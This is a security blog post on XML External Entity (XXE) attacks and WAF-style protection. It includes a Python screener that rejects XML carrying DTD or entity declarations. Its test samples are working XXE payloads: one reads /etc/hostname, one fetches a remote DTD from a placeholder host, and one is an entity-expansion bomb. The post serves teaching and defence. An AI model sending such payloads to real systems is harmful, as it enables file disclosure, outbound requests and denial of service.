F5 BIG-IP ASM - XXE Protection
I wrote about the OWASP Top 10 last year, where I described the new categories added in 2017. One of them is Insecure Deserialization; another is Insufficient Logging and Monitoring, which can be addressed with Security Information and Event Management (SIEM) systems; and the last category added to the OWASP Top 10 is XML External Entity (XXE), which is the category I'm going to write about today. These categories and the OWASP project were not in the university curriculum when I was studying. I think it's a pity, because the OWASP project should be taken into account at university as best practice for secure software development.
An XXE attack is an injection attack where the attacker inserts malicious XML to extract data, make the server issue remote requests, scan internal systems, perform a denial-of-service attack, or carry out other attacks. For instance, we can insert XML that lists the root directory of the file system or reveals the server's hostname. This issue is not easy to detect by manual testing, but SAST and DAST tools can discover and exploit an XXE vulnerability easily. Therefore, if you are working with XML and web services, you should also take XXE attacks into account.
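Every XXE variant described above depends on DTD constructs (a DOCTYPE with an ENTITY declaration pointing at a SYSTEM or PUBLIC resource), so one practical defence is to screen every incoming payload for those constructs and refuse it before any XML parser runs, which is the kind of inspection a WAF such as BIG-IP ASM performs at the edge. The following Python is an added example written for this post; it is not code from the original article, from F5, or from OWASP. The sample payloads (`CLEAN_ORDER`, `XXE_ORDER`, `PARAM_ORDER`, `BOMB_ORDER`) are constructed for the demonstration, and `dtd.example` is a placeholder host, not a real endpoint.

```python
import re
from typing import List
import xml.etree.ElementTree as ET

# XXE needs DTD machinery: a DOCTYPE plus an ENTITY declaration that points at
# a SYSTEM/PUBLIC (external) resource. Ordinary web-service payloads never
# carry a DTD, so any document that does is rejected before a parser sees it.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+%?\s*[\w.\-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
PARAMETER_ENTITY_RE = re.compile(rb"<!ENTITY\s+%", re.IGNORECASE)


class XXEBlocked(ValueError):
    """Raised when a payload carries DTD constructs used by XXE attacks."""


def inspect_xml(payload: bytes) -> List[str]:
    """Return the XXE indicators found in a raw XML payload (empty if clean)."""
    findings = []
    if DOCTYPE_RE.search(payload):
        findings.append("doctype")
    if ENTITY_RE.search(payload):
        findings.append("entity-declaration")
    if EXTERNAL_ENTITY_RE.search(payload):
        findings.append("external-entity")
    if PARAMETER_ENTITY_RE.search(payload):
        findings.append("parameter-entity")
    return findings


def safe_parse(payload: bytes) -> ET.Element:
    """Parse the XML only after the payload has passed the DTD screen."""
    findings = inspect_xml(payload)
    if findings:
        raise XXEBlocked("rejected XML payload: " + ", ".join(findings))
    return ET.fromstring(payload)


def is_blocked(payload: bytes) -> bool:
    """True if safe_parse refuses the payload, False if it parses it."""
    try:
        safe_parse(payload)
    except XXEBlocked:
        return True
    return False


# Constructed sample payloads (not captured traffic).
CLEAN_ORDER = b'<?xml version="1.0"?><order><item sku="A1">2</item></order>'

# Classic XXE: an external general entity that would read a local file
# (the hostname example from the text).
XXE_ORDER = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    b'<order><item sku="&xxe;">2</item></order>'
)

# Parameter-entity variant: the server would fetch a remote DTD.
# "dtd.example" is a placeholder host.
PARAM_ORDER = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY % ext SYSTEM "http://dtd.example/x.dtd"> %ext;]>'
    b"<order/>"
)

# Internal entities only (entity-expansion denial of service): no external
# reference, but still rejected because the document carries a DTD at all.
BOMB_ORDER = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
    b"<order>&b;</order>"
)

if __name__ == "__main__":
    for name, doc in [("clean", CLEAN_ORDER), ("xxe", XXE_ORDER),
                      ("param", PARAM_ORDER), ("bomb", BOMB_ORDER)]:
        verdict = "blocked" if is_blocked(doc) else "accepted"
        print(f"{name:6} {verdict:8} {inspect_xml(doc)}")
```

Two caveats for anyone adopting this pattern. First, screening must run on the bytes exactly as the parser will decode them (a payload in another encoding can slip past an ASCII pattern), so normalise the encoding before matching. Second, edge screening is defence in depth, not a replacement for configuring the parser itself to ignore DTDs: in lxml that means `XMLParser(resolve_entities=False, no_network=True)`, and in Java the `http://apache.org/xml/features/disallow-doctype-decl` feature on the parser factory.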
XML External Entity (XXE) Attack
If you want to know how to test and mitigate an XXE attack, see the next video:
Regards my friend and remember, keep studying!!